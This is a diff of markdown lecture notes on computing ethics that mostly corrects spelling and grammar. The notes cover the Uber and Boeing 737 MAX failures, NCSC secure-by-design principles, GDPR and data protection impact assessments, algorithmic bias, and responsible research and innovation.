- Furthermore, the car had its own in-built automatic braking system which was capable of detecting and stopping for Elaine, but it was disabled by Uber engineers as they thought it would interfere with Uber’s self driving sensors
|
||||
- Furthermore, the car had its own in-built automatic braking system which was capable of detecting and stopping for Elaine, but it was disabled by Uber engineers as they thought it would interfere with Uber’s self-driving sensors
|
||||
- When the car was just a second away from Elaine, Uber’s system finally recognised that the object could not be avoided
|
||||
- Now at this point, Uber’s system could have slammed on the brakes to migate the imapact, instead an *action supression* component kicked in.
|
||||
- This was implemented to avoid extreme manoeuvers in response to false alarms.
|
||||
- Now at this point, Uber’s system could have slammed on the brakes to mitigate the impact; instead, an *action suppression* component kicked in.
|
||||
- This was implemented to avoid extreme manoeuvres in response to false alarms.
|
||||
- Uber couldn’t supply documents showing checks performed on the backup driver
|
||||
|
||||
Computing failures are not restricted to 1 car and 2 plane crashes
|
||||
|
||||
The FDA reports, that medical device recalls are at an all time high and that defective software is a major cause. One in every three medical devices that use software for operations have been **recalled** because of **failures in their software**.
|
||||
The FDA reports that medical device recalls are at an all-time high and that defective software is a major cause. One in every three medical devices that use software for operations has been **recalled** because of **failures in their software**.
|
||||
|
||||
As the Uber and Boeing cases clearly demonstrate, dependability is still a critical issue in computing today.
|
||||
|
||||
- Apart from the direct human cost, the failure of computing systems costs a great deal of money.
|
||||
- The 5th edition of the Software Fail Watch identified 606 recorded software failures, impacting half of the world’s population (3.7 billion people) and 314 companies to the cost of 1.7 trillion dollars, and noted that “this is just scratching the surface – there are far more software defects in the world than we will likely ever know about.”
|
||||
|
||||
We have an ethical duty to the public to minimise these harms. I purposefully say minimise and not eradicate, as it is inevitable that things will go wrong some-times due to unforeseen circumstances, but if we exercise due diligence in our work then we should be able to significantly reduce the harms caused through what are euphemistically called “software bugs”.
|
||||
We have an ethical duty to the public to minimise these harms. I purposefully say minimise and not eradicate, as it is inevitable that things will go wrong sometimes due to unforeseen circumstances, but if we exercise due diligence in our work then we should be able to significantly reduce the harms caused through what are euphemistically called “software bugs”.
|
||||
|
||||
#### Software Bugs
|
||||
|
||||
@@ -70,7 +70,7 @@ The V Model adapts the waterfall by placing an emphasis on early testing
|
||||
|
||||
###### Spiral Model
|
||||
|
||||
Spiral model provides a major alternative and places testing, in iterative requirements, design, implement and test sequences that spiral out from one another and are marked by the development of increasingly high fidelity prototypes
|
||||
Spiral model provides a major alternative and places testing in iterative requirements, design, implement and test sequences that spiral out from one another and are marked by the development of increasingly high-fidelity prototypes
|
||||
|
||||
##### Testing Methodologies
|
||||
|
||||
@@ -143,11 +143,11 @@ Daniel Jackson and colleagues elaborate the point, saying that,
|
||||
|
||||
The bug at work here was a **faulty** angle of attack or AOA **sensor**, which indicated the angle at which the aircraft was positioned in flight.
|
||||
|
||||
The Ethiopian accident investigation report says that Boeing’s engineers determined that no piloted simulation, was required for take-off or low speed flight. This meant that specific failures that could lead to MCAS activation, such as false AOA input, were not simulated as part of the aircraft’s functional hazard assessment and validation tests.
|
||||
The Ethiopian accident investigation report says that Boeing’s engineers determined that no piloted simulation was required for take-off or low-speed flight. This meant that specific failures that could lead to MCAS activation, such as false AOA input, were not simulated as part of the aircraft’s functional hazard assessment and validation tests.
|
||||
|
||||
Boeing assumed that the worse that could happen would be single fault-driven MCAS activation that flight crew would correct as per “trained memory procedures” acquired during flight training for previous 737 models. As the graph showing the plane going up and down in the Vox video makes painfully visible, the MAX 8 crashes involved multiple MCAS activations, caused by the faulty AOA sensor.
|
||||
Boeing assumed that the worst that could happen would be single fault-driven MCAS activation that flight crew would correct as per “trained memory procedures” acquired during flight training for previous 737 models. As the graph showing the plane going up and down in the Vox video makes painfully visible, the MAX 8 crashes involved multiple MCAS activations, caused by the faulty AOA sensor.
|
||||
|
||||
Poor specification requirements: Input was only required from one AOA sensor to activate MCAS, depsite two sensors being fitted.
|
||||
Poor specification requirements: Input was only required from one AOA sensor to activate MCAS, despite two sensors being fitted.
|
||||
|
||||
- This means the faulty sensor constantly triggered MCAS
|
||||
- No information about MCAS was given in the flight crew manuals and MCAS was not included in flight crew training.
|
||||
|
||||
@@ -10,22 +10,22 @@ Security is legally required for systems that process personal data.
|
||||
|
||||
#### Why is Security so Important
|
||||
|
||||
In the UK 46% of businesses and 26% of charities have delt with cyber attacks
|
||||
In the UK 46% of businesses and 26% of charities have dealt with cyber attacks
|
||||
|
||||
Ransomware is the fastest growing type of cybercrime and costs are predicted to reach 20 billion dollars by 2021, which is 57 times greater than it was in 2015.
|
||||
Ransomware is the fastest-growing type of cybercrime and costs are predicted to reach 20 billion dollars by 2021, which is 57 times greater than it was in 2015.
|
||||
|
||||
Cyber security breaches have increased globally by 67% since 2014. They essentially operate in 2 ways:
|
||||
|
||||
1. Through bad actors, particularly people who try to phish for and otherwise elicit usernames and passwords to access systems
|
||||
2. Through bad computing, particularly the use of viruses, malware and denial of service attacks that compromise systems.
|
||||
|
||||
It is broadly acknowledged that IoT devices, which typically exploit low cost sensors, suffer from extremely poor and indeed non-existent security.
|
||||
It is broadly acknowledged that IoT devices, which typically exploit low-cost sensors, suffer from extremely poor and indeed non-existent security.
|
||||
|
||||
#### Causes of poor Security
|
||||
|
||||
In addition to internal reasons to do with poor coding and testing, and poor specification of technical and usability requirements, poor security has also been attributed to the law and limits of liability.
|
||||
|
||||
In the US, for example, the courts have consistently interpreted software licenses in a way that allows vendors to disclaim almost all liability for software defects.
|
||||
In the US, for example, the courts have consistently interpreted software licences in a way that allows vendors to disclaim almost all liability for software defects.
|
||||
|
||||
**The economic loss**: rule states that if a product causes no personal injury or property damage, other than to the product itself, then such damages are determined by contract law and limited to a breach of contract claim.
|
||||
|
||||
@@ -38,7 +38,7 @@ Now GDPR, the EU’s updated data protection regulation, goes some way towards i
|
||||
|
||||
#### National Cyber Security Strategy
|
||||
|
||||
UK Govement invested £1.9 bn in its National Cyber Security strategy in 2016.
|
||||
UK Government invested £1.9 bn in its National Cyber Security strategy in 2016.
|
||||
|
||||
The UK’s National Cyber Security Strategy stands on 3 pillars:
|
||||
|
||||
@@ -61,11 +61,11 @@ NCSC articulates **5 core secure by design principles**. These include:
|
||||
- External data inputs cannot be trusted
|
||||
- Data inputs must be sanitised, validated
|
||||
- Attack surfaces should be minimised, exposing as few components as possible
|
||||
- Read-only views should be enforced where ever possible
|
||||
- Read-only views should be enforced wherever possible
|
||||
- All privileged actions should be accessed through control functions and must be attributed to individuals
|
||||
3. Making disruption difficult
|
||||
- Identify system bottlenecks
|
||||
- Test systems with unreasonably high loads and Ddos attacks
|
||||
- Test systems with unreasonably high loads and DDoS attacks
|
||||
- Understanding how the system responds to failure
|
||||
- Monkey testing
|
||||
4. Making compromise detection easier
|
||||
@@ -80,11 +80,11 @@ NCSC articulates **5 core secure by design principles**. These include:
|
||||
|
||||
###### Component-driven Analysis
|
||||
|
||||
Focuses on the technical components a system is composed of, the threats and vulnerabilities that may effect those components, and the impact caused if any of the components was compromised.
|
||||
Focuses on the technical components a system is composed of, the threats and vulnerabilities that may affect those components, and the impact caused if any of the components was compromised.
|
||||
|
||||
This type of analysis allows the specific risks faced by specific components within a system to be identified and prioritised
|
||||
|
||||
1. According to the **ease** with which a vulnerablity could be exploited and a component comprimised.
|
||||
1. According to the **ease** with which a vulnerability could be exploited and a component compromised.
|
||||
2. According to the **severity** of impact.
|
||||
|
||||
The purpose of prioritising risks in this way is to mitigate the worst risks first.
|
||||
@@ -97,7 +97,7 @@ NCSC suggests we rarely consider what a system should not do at the beginning of
|
||||
|
||||
### Securing the IoT
|
||||
|
||||
There are more the 10 billion IoT devices as of 2021. This inevitably creates an exponential increase in the attack surface and opens up society to cyber attack on an unprecedented scale, especially as IoT devices are broadly recognised to have very poor cyber security.
|
||||
There are more than 10 billion IoT devices as of 2021. This inevitably creates an exponential increase in the attack surface and opens up society to cyber attack on an unprecedented scale, especially as IoT devices are broadly recognised to have very poor cyber security.
|
||||
|
||||
#### Guidelines
|
||||
|
||||
@@ -161,6 +161,3 @@ There are more the 10 billion IoT devices as of 2021. This inevitably creates an
|
||||
13. **Delete personal data**
|
||||
|
||||
- Users should be able to **delete personal data** easily if they wish to, when there is a transfer of ownership, or when they dispose of a device.
|
||||
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@ https://privacyinternational.org/explainer/56/what-privacy
|
||||
|
||||
Privacy is a fundamental human right and underpins many other human rights including freedom of association and free speech.
|
||||
|
||||
It’s politically contentious status makes it an ethical imperative in professional computing and key to ensuring public confidence and trust.
|
||||
Its politically contentious status makes it an ethical imperative in professional computing and key to ensuring public confidence and trust.
|
||||
|
||||
> That’s why the BCS and ACM include “respect for privacy” as a requirement in their ethics codes, and the IEEE has a separate Data Access and Use policy to align it with industry best practice and ensure compliance with international regulations including the European Union’s General Data Protection Regulation or GDPR
|
||||
|
||||
@@ -55,7 +55,7 @@ The **data subject** is a natural person, an individual who can be identified, d
|
||||
**Personal data** is **any** information relating to an identified **or** identifiable person (i.e., the ‘data subject’), **either directly or indirectly**. Personal data includes a bunch of technical information including such things as account handles, IP or MAC addresses, cookies, RFID frequencies, device fingerprints, etc.
|
||||
|
||||
- The key point here is that personal data may not directly link to a *data subject* as say a passport might
|
||||
- But may relate indirectly to a person once the data has been procesed
|
||||
- But may relate indirectly to a person once the data has been processed
|
||||
|
||||
**Processing** means any operation or set of operations which is performed on personal data or on sets of personal data, whether or not by automated means.
|
||||
|
||||
@@ -77,7 +77,7 @@ Similarly, **processor** does not refer to a CPU on a computer, but to the perso
|
||||
|
||||
**Controller** means the person, legal entity, public authority, agency or other body which, alone or jointly with others, determines the purposes for which personal data will be processed and the means of processing them.
|
||||
|
||||
**Data protection** officer or **DPO**, who may be an employee of the controller or processor or an independent contractor who has expert knowledge of data protection law and must be consulted by the controller or processor in a timely manner in all issues which relate to the protection of personal data. A DPO must be appointed if a controller or processor’s core activities involve the processing of personal data on a large scale or involve large scale, regular and systematic monitoring of individuals.
|
||||
**Data protection** officer or **DPO**, who may be an employee of the controller or processor or an independent contractor who has expert knowledge of data protection law and must be consulted by the controller or processor in a timely manner in all issues which relate to the protection of personal data. A DPO must be appointed if a controller or processor’s core activities involve the processing of personal data on a large scale or involve large-scale, regular and systematic monitoring of individuals.
|
||||
|
||||
#### GDPR
|
||||
|
||||
@@ -87,7 +87,7 @@ GDPR places specific legal requirements on controllers, which directly impact pr
|
||||
|
||||
> The European Data Protection Board or EDPD, which furnishes guidance on GDPR tells us that, “a ‘default’, as commonly defined in computer science, refers to the pre-existing or preselected value of a configurable setting that is assigned to a software application, computer program or device. Such settings are also called ‘presets’ or ‘factory presets’.” EDPB Guidelines
|
||||
|
||||
So the term **implement by default** in GDPR refers to the design of preset technical and organisational measures to ensure that data processing operations meet the requirements of GDPR and thus protects the legal rights of data subjects. We’ll take a look at what those presets are about shortly.
|
||||
So the term **implement by default** in GDPR refers to the design of preset technical and organisational measures to ensure that data processing operations meet the requirements of GDPR and thus protect the legal rights of data subjects. We’ll take a look at what those presets are about shortly.
|
||||
|
||||
The controller is legally **accountable** for the choice of presets and implementing data protection by design and default. (Article 5 GDPR)
|
||||
|
||||
@@ -109,7 +109,7 @@ These include:
|
||||
|
||||
> **Recital 63** which says, “Where possible, the controller should be able to provide remote access to a secure system which would provide the data subject with direct access to his or her personal data.”
|
||||
|
||||
So transparency is something that needs to built into systems in the long term and not simply be seen as a matter of appending documentation to their use.
|
||||
So transparency is something that needs to be built into systems in the long term and not simply be seen as a matter of appending documentation to their use.
|
||||
|
||||
The controller must also by default identify and declare a **valid legal basis** for the processing. Six legal grounds exist including:
|
||||
|
||||
@@ -130,9 +130,9 @@ This is called **purpose limitation**. It means a controller cannot simply colle
|
||||
|
||||
**Data minimisation**: the controller must ensure that data collection is limited to what is necessary to meet the purposes for which they are being processed.
|
||||
|
||||
Data minimisation requires that the controller verify whether the purposes can be achieved by processing less personal data, or having less detailed or aggregated personal data or without having to process personal data at all. Such verification should take place before any processing takes place, and be carried out at any during the processing lifecycle.
|
||||
Data minimisation requires that the controller verify whether the purposes can be achieved by processing less personal data, or having less detailed or aggregated personal data or without having to process personal data at all. Such verification should take place before any processing takes place, and be carried out during the processing lifecycle.
|
||||
|
||||
Data minimisation also refers to the degree of identification. If the purpose does not require the final set of data to refer to an individual (such as statistics) - then the controller should delete or anonymise personal data as soon as possible. If continued identification is needed for other processing activities, personal data should be pseudonymized to mitigate risks for the data subjects’ rights.
|
||||
Data minimisation also refers to the degree of identification. If the purpose does not require the final set of data to refer to an individual (such as statistics) - then the controller should delete or anonymise personal data as soon as possible. If continued identification is needed for other processing activities, personal data should be pseudonymised to mitigate risks for the data subjects’ rights.
|
||||
|
||||
By default, the controller must **limit** the period for which personal data kept in a form which permits identification of data subjects are **stored** and retain data in such a form for no longer than is necessary to meet the purposes for which it has been collected.
|
||||
|
||||
@@ -152,23 +152,23 @@ DPIA - **D**ata **P**rotection **I**mpact **A**ssessments
|
||||
|
||||
A DPIA is also required by law where large amounts of special category data are processed.
|
||||
|
||||
Special category data is data that reveal racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, bio-metric data for the purpose of uniquely identifying a natural person, data concerning health or data concerning a natural person's sex life or sexual orientation.
|
||||
Special category data is data that reveal racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, biometric data for the purpose of uniquely identifying a natural person, data concerning health or data concerning a natural person's sex life or sexual orientation.
|
||||
|
||||
DPIAs are legally required for these areas of personal data processing, but they are generally recommended as “good practice” for any processing of personal data. https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/accountability-and-governance/data-protection-impact-assessments/
|
||||
|
||||
### How to know when processing is high risk
|
||||
|
||||
There are 4 critieria specified in GDPR article 35
|
||||
There are 4 criteria specified in GDPR article 35
|
||||
|
||||
1. The use of new technologies to process personal data
|
||||
2. Automated-decision making with legal or significant effect
|
||||
2. Automated decision-making with legal or significant effect
|
||||
3. Processing of special category data
|
||||
4. Systematic monitoring of public spaces
|
||||
|
||||
There are additional criteria
|
||||
|
||||
5. **Evaluation or scoring, including profiling and predicting**
|
||||
- especially of data concerning the data subject's performance at work, economic situation, health, personal preferences or interests, reliability or behavior, location or movements.
|
||||
- especially of data concerning the data subject's performance at work, economic situation, health, personal preferences or interests, reliability or behaviour, location or movements.
|
||||
- Examples of this are financial institutions that screen customers against a credit reference database
|
||||
6. **The processing of sensitive data or data of a highly personal nature**
|
||||
- Not only special categories of personal data, but also any data considered as sensitive as the term is commonly understood
|
||||
@@ -189,7 +189,7 @@ There are additional criteria
|
||||
|
||||
**If a processing operation meets 2 of these criteria, then a DPIA is required by law.**
|
||||
|
||||
#### Whats involved in carrying out a DPIA?
|
||||
#### What’s involved in carrying out a DPIA?
|
||||
|
||||
###### Step 1
|
||||
|
||||
@@ -205,14 +205,14 @@ Specify the nature of the processing including the source of the data
|
||||
- how it will be collected, used, stored and deleted
|
||||
- the amount of data to be collected
|
||||
- the frequency and duration of collection and storage, and the geographical area covered
|
||||
- the flow of data and if it will be shared, how and with who
|
||||
- the flow of data and if it will be shared, how and with whom
|
||||
- any types of processing that are identified as high risk.
|
||||
|
||||
Also involves specifying the purpose or purposes of the processing and what the controller wants to achieve by processing the data, including the intended effect on data subjects (if any), the benefits of the processing to the controller and more broadly.
|
||||
|
||||
###### Step 3
|
||||
|
||||
Is consider the need for consultation
|
||||
Consider the need for consultation
|
||||
|
||||
1. when and how the views of data subjects will be sought
|
||||
2. justifying why it is not appropriate to do so
|
||||
@@ -221,11 +221,11 @@ Third & external parties need to be consulted to ensure data protection by desig
|
||||
|
||||
###### Step 4
|
||||
|
||||
Accessing necessity and proportionality, which involves specifying how the processing will actually achieve the purpose and that there is no other way to achieve the same outcome.
|
||||
Assessing necessity and proportionality, which involves specifying how the processing will actually achieve the purpose and that there is no other way to achieve the same outcome.
|
||||
|
||||
- the lawful basis for processing
|
||||
- how data minimisation and data quality will be ensured
|
||||
- how function creep will be prevented; what information will be given to data subjects and their rights will be supported
|
||||
- how function creep will be prevented; what information will be given to data subjects and how their rights will be supported
|
||||
- measures that will be taken to ensure processors are in compliance with DPbDD
|
||||
- how any international data transfers will be safeguarded.
|
||||
|
||||
@@ -248,9 +248,9 @@ Identify and specify measures to mitigate the risks, including the options avail
|
||||
|
||||
###### Step 7
|
||||
|
||||
Have the DPAI signed off and outcomes recorded. If the DPO’s advice is overruled, justification must be provided, as must the reasons for not abiding by consultation outcomes. A **review date must also be specified** for the DPIA and done so over the lifetime of a processing operation.
|
||||
Have the DPIA signed off and outcomes recorded. If the DPO’s advice is overruled, justification must be provided, as must the reasons for not abiding by consultation outcomes. A **review date must also be specified** for the DPIA and done so over the lifetime of a processing operation.
|
||||
|
||||
You cannot do a DPIA on your own. IBM’s Dave Whitelegg says you must have the following invovled
|
||||
You cannot do a DPIA on your own. IBM’s Dave Whitelegg says you must have the following involved
|
||||
|
||||
> - The developer lead or project manager, who is responsible for managing the DPIA process.
|
||||
> - A data protection officer who must be consulted about and sign off on the DPIA process*.*
|
||||
@@ -277,7 +277,7 @@ However, we should not forget that documentation is a key part of the software e
|
||||
- removing names or postcodes.
|
||||
2. Substitution, which involves overwriting personal data identifier fields with fake personal data.
|
||||
3. Data masking, which involves substituting identifier field characters with a ‘mask’ character,
|
||||
- e.g., inserting X’s instead numbers on a credit card field.
|
||||
- e.g., inserting X’s instead of numbers on a credit card field.
|
||||
4. Scrambling / shuffling, which involves moving the contents of identifier fields around
|
||||
- e.g. moving surnames up or down.
|
||||
5. Aggregation / generalisation, which involves rendering data in statistical form.
|
||||
@@ -287,4 +287,3 @@ However, we should not forget that documentation is a key part of the software e
|
||||
https://owasp.org/www-project-top-ten/
|
||||
|
||||
Privacy engineering may help you implement the presets and meet the requirements, but it is your **ethical responsibility** to know and respect the rules that pertain to professional work. You now know what rules you need to follow to respect people’s privacy and protect their data.
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Automonous Systems
|
||||
# Autonomous Systems
|
||||
|
||||
Autonomous systems include robots and cyber physical systems that actuate or perform actions in the world, and algorithmic systems particularly machine learning systems or AI.
|
||||
Autonomous systems include robots and cyber-physical systems that actuate or perform actions in the world, and algorithmic systems particularly machine learning systems or AI.
|
||||
|
||||
The UK robotics and autonomous systems or RAS network identifies 7 key ethical challenges that confront autonomous systems. These include
|
||||
|
||||
@@ -20,7 +20,7 @@ Alan Winfield and Marina Jirotka in their Royal Society paper on building societ
|
||||
|
||||
###### The Third Pillar
|
||||
|
||||
Recommends we take particular care about the use of AI in safety critical systems. Of particular concern, as we will take a closer look at later in this lecture, are artificial neural networks, whose decision-making cannot easily be verified. Neural networks learn for themselves and how they arrive at particular decisions is extremely difficult if not impossible to determine.
|
||||
Recommends we take particular care about the use of AI in safety-critical systems. Of particular concern, as we will take a closer look at later in this lecture, are artificial neural networks, whose decision-making cannot easily be verified. Neural networks learn for themselves and how they arrive at particular decisions is extremely difficult if not impossible to determine.
|
||||
|
||||
###### Fourth Pillar
|
||||
|
||||
@@ -35,7 +35,7 @@ Good governance, transparency not only of product, i.e., how an autonomous syste
|
||||
|
||||
Build ethical governors into autonomous systems which would enable a robot or AI system to evaluate the consequences of its actions and modify its actions according to a set of ethical rules.
|
||||
|
||||
This is a longstanding ideal in AI, which must address the fundamental problem of encoding and implementing ethics, all of which begs the question of who’s ethics get encoded and implemented? Pillar five is then the most idealistic, problematic and challenging of Winfield and Jirotka’s proposals.
|
||||
This is a longstanding ideal in AI, which must address the fundamental problem of encoding and implementing ethics, all of which begs the question of whose ethics get encoded and implemented? Pillar five is then the most idealistic, problematic and challenging of Winfield and Jirotka’s proposals.
|
||||
|
||||
### Deception
|
||||
|
||||
@@ -46,10 +46,10 @@ For example, Babyclon’s animatronic babies and the strong emotions they evoke
|
||||
The issue of deception is part of a broader set of ethical principles governing the development of robots advocated by the UK’s Engineering and Physical Sciences Research Council or EPSRC
|
||||
|
||||
- **Principle 1** states that robots should not be designed solely or primarily to kill or harm humans, except in the interests of national security.
|
||||
- **Principe 2** states that humans, not robots, are responsible agents and that robots should therefore be designed and operated in compliance with existing laws and respect the fundamental rights and freedoms of human beings, including privacy.
|
||||
- **Principle 2** states that humans, not robots, are responsible agents and that robots should therefore be designed and operated in compliance with existing laws and respect the fundamental rights and freedoms of human beings, including privacy.
|
||||
- **Principle 3** states that robots should be designed to be safe and secure.
|
||||
- **Principle 4** states that robots are manufactured artefacts and their machine nature should therefore be transparent so as to avoid deception.
|
||||
- **Principe 5** states that the party with legal responsibility for a robot should always be attributed, which is to say that it should always be possible to find out who is responsible for any robot.
|
||||
- **Principle 5** states that the party with legal responsibility for a robot should always be attributed, which is to say that it should always be possible to find out who is responsible for any robot.
|
||||
- This of course is not a straightforward matter as the disruption of flights at airports by drones demonstrates.
|
||||
|
||||
### Algorithmic Bias
|
||||
@@ -64,7 +64,7 @@ Discrimination is rife in computing today:
|
||||
- systematic discrimination against female job candidates and black patients in need of healthcare
|
||||
- the A-Level debacle in the UK
|
||||
|
||||
Discrimination, is a specific form of harm based on a personal characteristics including gender identity, marital status, sexual orientation, colour, race, ethnic origin, nationality, religion, age, union membership, political affiliation, military status, and disability.
|
||||
Discrimination is a specific form of harm based on personal characteristics including gender identity, marital status, sexual orientation, colour, race, ethnic origin, nationality, religion, age, union membership, political affiliation, military status, and disability.
|
||||
|
||||
These characteristics are otherwise called **“special categories of personal data”** or **“protected characteristics”** and are regulated by GDPR and equality legislation, which would appear to provide a relatively straightforward way of tackling algorithmic bias.
|
||||
|
||||
@@ -73,23 +73,23 @@ These characteristics are otherwise called **“special categories of personal d
|
||||
Selena Silva and Martin Kenney identify 9 sources of algorithmic bias within the ML life cycle. https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3246252
|
||||
|
||||
1. **Training bias**
|
||||
- The data used to train the algorithm may be unrepresentive or prejudiced
|
||||
- A facial recognition algorithm is trained on data which primarily consists of white faces, it will be worse at recognising black faces and may even categorise them wrongly.
|
||||
- The data used to train the algorithm may be unrepresentative or prejudiced
|
||||
- If a facial recognition algorithm is trained on data which primarily consists of white faces, it will be worse at recognising black faces and may even categorise them wrongly.
|
||||
2. **Algorithmic focus bias**
|
||||
- The attributes it takes into account and either includes or excludes
|
||||
- The exclusion of gender or race in a health diagnostic algorithm can lead to inaccurate and harmful outcomes.
|
||||
- Whereas the inclusion of gender or race in a sentencing algorithm can lead to discrimination against protected groups.
|
||||
3. **Algorithmic processing bias**
|
||||
- Thomas Guskey and Lee Ann Jung found, for example, that when an ML algorithm processed student grades across a learning module, it scored students based on the average marks for their assignments, but when teachers were given the same data, they adjusted the students’ score according to their progress and understanding of the material and provided a fairer assessment of students learning. https://core.ac.uk/download/pdf/232576892.pdf
|
||||
- Thomas Guskey and Lee Ann Jung found, for example, that when an ML algorithm processed student grades across a learning module, it scored students based on the average marks for their assignments, but when teachers were given the same data, they adjusted the students’ scores according to their progress and understanding of the material and provided a fairer assessment of students’ learning. https://core.ac.uk/download/pdf/232576892.pdf
|
||||
4. **Non-transparency bias**
|
||||
- The lack of transparency about algorithmic decision-making.
|
||||
- This is not only to do with how decisions were arrived, but also concerns IPR and trade secrets and what developers are willing and expected to divulge about their ML systems and AI
|
||||
- This is not only to do with how decisions were arrived at, but also concerns IPR and trade secrets and what developers are willing and expected to divulge about their ML systems and AI
|
||||
5. **Transfer context bias**
|
||||
- The use of ML systems in inappropriate or unintended contexts is also a source of bias. The use of credit scores as a variable in employment provides a ready example of what is called “**transfer context bias**”
|
||||
- Employer’s request credit checks on job candidates, which effectively means that bad credit is being equated with bad job performance.
|
||||
- Employers request credit checks on job candidates, which effectively means that bad credit is being equated with bad job performance.
|
||||
6. **Automation bias**
|
||||
- A human bias which involves the users of algorithmic systems treating outputs as objectively true, rather than as statistical probabilities.
|
||||
- Such as the COMPAS system used by judges in sentencing criminals in the US, provides a good example, where a judge might take the output at face value and apply it uncritically, without reference to other information
|
||||
- The COMPAS system used by judges in sentencing criminals in the US provides a good example, where a judge might take the output at face value and apply it uncritically, without reference to other information
|
||||
- Automation bias is very much a case of “computer says so …”
|
||||
7. **Consumer bias**
|
||||
- Is bias expressed by the users of digital platforms
|
||||
@@ -99,4 +99,4 @@ Selena Silva and Martin Kenney identify 9 sources of algorithmic bias within the
|
||||
- So even though an ML system may have been developed without bias in its training, focus and initial processing of data, over time bias may be introduced through use.
|
||||
- Twitter taught Microsoft’s AI chatbot Tay to be a racist in less than a day.
|
||||
9. **Interpretation bias**
|
||||
- Occurs when users interpret outputs according to their own prejudices. For example, it is ultimately up to a judge to interpret the score provided by a recidivism prediction system such as COMPAS, and to decide what action to take. However, a judge may interpret a risk score of 6 as high in a particular case, while they may treat it as indicator of medium or even low risk in another.
|
||||
- Occurs when users interpret outputs according to their own prejudices. For example, it is ultimately up to a judge to interpret the score provided by a recidivism prediction system such as COMPAS, and to decide what action to take. However, a judge may interpret a risk score of 6 as high in a particular case, while they may treat it as an indicator of medium or even low risk in another.
|
||||
@@ -14,7 +14,7 @@ An 80 billion euro programme to tackle:
|
||||
- Inclusive and innovative society
|
||||
- Secure society protecting the rights and freedoms of citizens
|
||||
|
||||
What RRI seeks to achieve with respect to these grand challenges is **situate** science and technology development in its **social context**. Fundamentally, RRI aims to drive high quality innovations in science and technology that are in the public interest and create a society in which research and innovation practices work towards **ethically acceptable, socially desirable and sustainable outcomes**.
|
||||
What RRI seeks to achieve with respect to these grand challenges is to **situate** science and technology development in its **social context**. Fundamentally, RRI aims to drive high-quality innovations in science and technology that are in the public interest and create a society in which research and innovation practices work towards **ethically acceptable, socially desirable and sustainable outcomes**.
|
||||
|
||||
#### Responsible Innovation
|
||||
|
||||
@@ -38,7 +38,7 @@ Reflexivity is particularly important at an institutional or organisational leve
|
||||
|
||||
This is called “second-order reflexivity” and contrasts with “first-order reflexivity”, where individuals reflect on and scrutinise themselves privately. Second-order reflexivity seeks to make reflexivity a public matter and leads to kinds of consideration of ethical governance proposed by Alan Winfield and Marina Jirotka we discussed in lecture 7.
|
||||
|
||||
Reflexivity is key to the development of ethically acceptable and socially desirable innovations. It requires researchers and innovators see beyond organisational boundaries and responsibilities and consider their wider, moral responsibilities.
|
||||
Reflexivity is key to the development of ethically acceptable and socially desirable innovations. It requires researchers and innovators to see beyond organisational boundaries and responsibilities and consider their wider, moral responsibilities.
|
||||
|
||||
**Inclusion**
|
||||
|
||||
@@ -60,34 +60,34 @@ Stilgoe et al. also place emphasis on the role of governance approaches in R&I,
|
||||
|
||||
https://www.epsrc.ac.uk/research/framework
|
||||
|
||||
The framework is called **AREA** and reflects the 4 dimensions of Stilgoe et als responsible innovation framework, reframed as Anticipate, Engage, Reflect and Act.
|
||||
The framework is called **AREA** and reflects the 4 dimensions of Stilgoe et al.’s responsible innovation framework, reframed as Anticipate, Engage, Reflect and Act.
|
||||
|
||||
**Anticipate** asks researchers to describe and analyse any economic, social and / or environmental impacts, intended or otherwise, that might arise from the proposed research. The aim is not to predict the actual impact of the proposed research, but to explore potential impacts and implications of the research that may otherwise remain ignored during the research the process.
|
||||
**Anticipate** asks researchers to describe and analyse any economic, social and/or environmental impacts, intended or otherwise, that might arise from the proposed research. The aim is not to predict the actual impact of the proposed research, but to explore potential impacts and implications of the research that may otherwise remain ignored during the research process.
|
||||
|
||||
**Reflect** asks researchers to reflect on the purposes, motivations, and potential implications of their research, and the associated uncertainties, areas of ignorance, assumptions, framings, questions, dilemmas and social transformations these may occasion.
|
||||
|
||||
**Engage** asks researchers to open up their research visions and their potential impacts to broader deliberation, dialogue, engagement and debate with stakeholders and the public in an inclusive way.
|
||||
|
||||
**Act** asks researchers to using the processes of Anticipation, Reflection and Engagement to influence the direction and trajectory of the research and innovation process itself.
|
||||
**Act** asks researchers to use the processes of Anticipation, Reflection and Engagement to influence the direction and trajectory of the research and innovation process itself.
|
||||
|
||||
So RRI is an important part of the EU and UK research and innovation pipeline and will become much more so now that the UK research councils have been brought together under the umbrella of UK Research and Innovation or UKRI.
|
||||
|
||||
## How does RRI work?
|
||||
|
||||
The focus of RRI is not only on achieving ethically acceptable, socially desirable and sustainable outcomes. It also and fundamentally concerned with *how* research and innovation is conducted and the parties involved in the process. RRI can thus be broken down into four key elements: **policy**, **stakeholders**, **outcomes**, **process**.
|
||||
The focus of RRI is not only on achieving ethically acceptable, socially desirable and sustainable outcomes. It is also and fundamentally concerned with *how* research and innovation is conducted and the parties involved in the process. RRI can thus be broken down into four key elements: **policy**, **stakeholders**, **outcomes**, **process**.
|
||||
|
||||
###### Policy
|
||||
|
||||
The EU sets out six key policies to shape responsible research and innovation processes, which are target at governments, funding agencies and R&I organisations.
|
||||
The EU sets out six key policies to shape responsible research and innovation processes, which are targeted at governments, funding agencies and R&I organisations.
|
||||
|
||||
1. Robust goverence
|
||||
1. Robust governance
|
||||
- RRI principles should, as a matter of policy, be **embedded in robust** **governance** frameworks. These frameworks should be flexible and adapt to change so as to be capable of responding to the unpredictable nature of research and innovation.
|
||||
2. Gender equality
|
||||
- It is also a matter of policy that research and innovation take the perspectives of both men and women into account to ensure outcomes are relevant to the whole population.
|
||||
- Decision-making bodies and R&I organisations should have balanced gender representation and strive to ensure **gender equality** in research and innovation.
|
||||
3. Integrity
|
||||
- Honesty, accountability, fairness and good stewardship should be core principles of research and innovation and are key to ensuring the **integrity** of R&I.
|
||||
4. Public and stakeholder engagment
|
||||
4. Public and stakeholder engagement
|
||||
- The **public and other stakeholders** should, as a matter of policy, be **engaged in research** and innovation processes as early as possible to avoid tokenism, ensure outcomes align with the values, needs and expectations of society and to avert societal backlash
|
||||
- as, for example, happened with the attempted introduction of GM crops into the UK
|
||||
5. Open Access (FAIR)
|
||||
